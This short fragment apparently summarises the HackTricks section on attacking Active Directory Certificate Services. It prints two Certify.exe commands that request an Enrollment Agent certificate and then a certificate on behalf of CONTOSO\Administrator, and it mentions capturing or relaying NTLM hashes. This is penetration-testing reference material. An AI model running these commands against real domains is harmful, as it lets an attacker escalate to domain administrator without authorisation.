The AD Certificates section on HackTricks breaks down the complex world of PKI into actionable attack vectors:
Allows remote attackers to capture NTLM hashes or relay authentication.
Certify.exe request /ca:CA\CA /template:EnrollmentAgent
Certify.exe request /ca:CA\CA /template:User /onbehalfof:CONTOSO\Administrator